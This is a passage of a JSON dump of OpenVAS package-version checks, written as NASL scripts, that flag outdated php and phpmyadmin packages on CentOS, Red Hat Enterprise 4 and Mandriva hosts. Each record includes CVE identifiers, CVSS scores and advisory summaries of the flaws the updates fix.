isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-03T10:54:47", "description": "Check for the Version of php", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "CentOS Update for php CESA-2010:0919 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", 
"CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2018-01-02T00:00:00", "id": "OPENVAS:1361412562310880456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880456", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2010:0919 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n An input validation flaw was discovered in the PHP session serializer. If a\n PHP script generated session variable names from untrusted user input, a\n remote attacker could use this flaw to inject an arbitrary variable into\n the PHP session. (CVE-2010-3065)\n \n An information leak flaw was discovered in the PHP var_export() function\n implementation. 
If some fatal error occurred during the execution of this\n function (such as the exhaustion of memory or script execution time limit),\n part of the function's output was sent to the user as script output,\n possibly leading to the disclosure of sensitive information.\n (CVE-2010-2531)\n \n A numeric truncation error and an input validation flaw were found in the\n way the PHP utf8_decode() function decoded partial multi-byte sequences\n for some multi-byte encodings, sending them to output without them being\n escaped. An attacker could use these flaws to perform a cross-site\n scripting attack. (CVE-2009-5016, CVE-2010-3870)\n \n It was discovered that the PHP lcg_value() function used insufficient\n entropy to seed the pseudo-random number generator. A remote attacker could\n possibly use this flaw to predict values returned by the function, which\n are used to generate session identifiers by default. This update changes\n the function's implementation to use more entropy during seeding.\n (CVE-2010-1128)\n \n It was discovered that the PHP fnmatch() function did not restrict the\n length of the pattern argument. A remote attacker could use this flaw to\n crash the PHP interpreter where a script used fnmatch() on untrusted\n matching patterns. (CVE-2010-1917)\n \n A NULL pointer dereference flaw was discovered in the PHP XML-RPC\n extension. A malicious XML-RPC client or server could use this flaw to\n crash the PHP interpreter via a specially-crafted XML-RPC request.\n (CVE-2010-0397)\n \n All php users should upgrade to these updated packages, which contain\n backported patches to resolve these issues. 
After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"php on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-December/017205.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880456\");\n script_version(\"$Revision: 8269 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 08:28:22 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0919\");\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_name(\"CentOS Update for php CESA-2010:0919 centos4 i386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not 
vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for php CESA-2010:0919 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310880633", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880633", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2010:0919 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2010-November/017198.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880633\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2010:0919\");\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_name(\"CentOS Update for php CESA-2010:0919 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"php on CentOS 5\");\n script_tag(name:\"insight\", value:\"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n An input validation flaw was discovered in the PHP session serializer. 
If a\n PHP script generated session variable names from untrusted user input, a\n remote attacker could use this flaw to inject an arbitrary variable into\n the PHP session. (CVE-2010-3065)\n\n An information leak flaw was discovered in the PHP var_export() function\n implementation. If some fatal error occurred during the execution of this\n function (such as the exhaustion of memory or script execution time limit),\n part of the function's output was sent to the user as script output,\n possibly leading to the disclosure of sensitive information.\n (CVE-2010-2531)\n\n A numeric truncation error and an input validation flaw were found in the\n way the PHP utf8_decode() function decoded partial multi-byte sequences\n for some multi-byte encodings, sending them to output without them being\n escaped. An attacker could use these flaws to perform a cross-site\n scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\n It was discovered that the PHP lcg_value() function used insufficient\n entropy to seed the pseudo-random number generator. A remote attacker could\n possibly use this flaw to predict values returned by the function, which\n are used to generate session identifiers by default. This update changes\n the function's implementation to use more entropy during seeding.\n (CVE-2010-1128)\n\n It was discovered that the PHP fnmatch() function did not restrict the\n length of the pattern argument. A remote attacker could use this flaw to\n crash the PHP interpreter where a script used fnmatch() on untrusted\n matching patterns. (CVE-2010-1917)\n\n A NULL pointer dereference flaw was discovered in the PHP XML-RPC\n extension. A malicious XML-RPC client or server could use this flaw to\n crash the PHP interpreter via a specially-crafted XML-RPC request.\n (CVE-2010-0397)\n\n All php users should upgrade to these updated packages, which contain\n backported patches to resolve these issues. 
After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-15T11:58:07", "description": "Check for the Version of php", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "CentOS Update for php CESA-2010:0919 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2017-12-15T00:00:00", "id": "OPENVAS:880456", 
"href": "http://plugins.openvas.org/nasl.php?oid=880456", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2010:0919 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n An input validation flaw was discovered in the PHP session serializer. If a\n PHP script generated session variable names from untrusted user input, a\n remote attacker could use this flaw to inject an arbitrary variable into\n the PHP session. (CVE-2010-3065)\n \n An information leak flaw was discovered in the PHP var_export() function\n implementation. 
If some fatal error occurred during the execution of this\n function (such as the exhaustion of memory or script execution time limit),\n part of the function's output was sent to the user as script output,\n possibly leading to the disclosure of sensitive information.\n (CVE-2010-2531)\n \n A numeric truncation error and an input validation flaw were found in the\n way the PHP utf8_decode() function decoded partial multi-byte sequences\n for some multi-byte encodings, sending them to output without them being\n escaped. An attacker could use these flaws to perform a cross-site\n scripting attack. (CVE-2009-5016, CVE-2010-3870)\n \n It was discovered that the PHP lcg_value() function used insufficient\n entropy to seed the pseudo-random number generator. A remote attacker could\n possibly use this flaw to predict values returned by the function, which\n are used to generate session identifiers by default. This update changes\n the function's implementation to use more entropy during seeding.\n (CVE-2010-1128)\n \n It was discovered that the PHP fnmatch() function did not restrict the\n length of the pattern argument. A remote attacker could use this flaw to\n crash the PHP interpreter where a script used fnmatch() on untrusted\n matching patterns. (CVE-2010-1917)\n \n A NULL pointer dereference flaw was discovered in the PHP XML-RPC\n extension. A malicious XML-RPC client or server could use this flaw to\n crash the PHP interpreter via a specially-crafted XML-RPC request.\n (CVE-2010-0397)\n \n All php users should upgrade to these updated packages, which contain\n backported patches to resolve these issues. 
After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"php on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-December/017205.html\");\n script_id(880456);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0919\");\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_name(\"CentOS Update for php CESA-2010:0919 centos4 i386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.31\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", 
"cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-08-18T00:00:00", "type": "openvas", "title": "Mandriva Update for phpmyadmin MDVSA-2011:124 (phpmyadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2505", "CVE-2011-2718", "CVE-2011-2643", "CVE-2011-2506", "CVE-2011-2719", "CVE-2011-2507"], "modified": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310831441", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831441", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpmyadmin MDVSA-2011:124 (phpmyadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-08/msg00006.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831441\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-18 14:57:45 +0200 (Thu, 18 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"MDVSA\", value:\"2011:124\");\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\", \"CVE-2011-2643\", \"CVE-2011-2718\", \"CVE-2011-2719\");\n script_name(\"Mandriva Update for phpmyadmin MDVSA-2011:124 (phpmyadmin)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpmyadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_mes5\");\n script_tag(name:\"affected\", value:\"phpmyadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities has been discovered and corrected in\n phpmyadmin:\n\n libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication\n 
feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1\n assigns values to arbitrary parameters referenced in the query string,\n which allows remote attackers to modify the SESSION superglobal array\n via a crafted request, related to a remote variable manipulation\n vulnerability. (CVE-2011-2505).\n\n setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2\n and 3.4.x before 3.4.3.1 does not properly restrict the presence of\n comment closing delimiters, which allows remote attackers to conduct\n static code injection attacks by leveraging the ability to modify\n the SESSION superglobal array (CVE-2011-2506).\n\n libraries/server_synchronize.lib.php in the Synchronize implementation\n in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not\n properly quote regular expressions, which allows remote authenticated\n users to inject a PCRE e (aka PREG_REPLACE_EVAL) modifier, and\n consequently execute arbitrary PHP code, by leveraging the ability\n to modify the SESSION 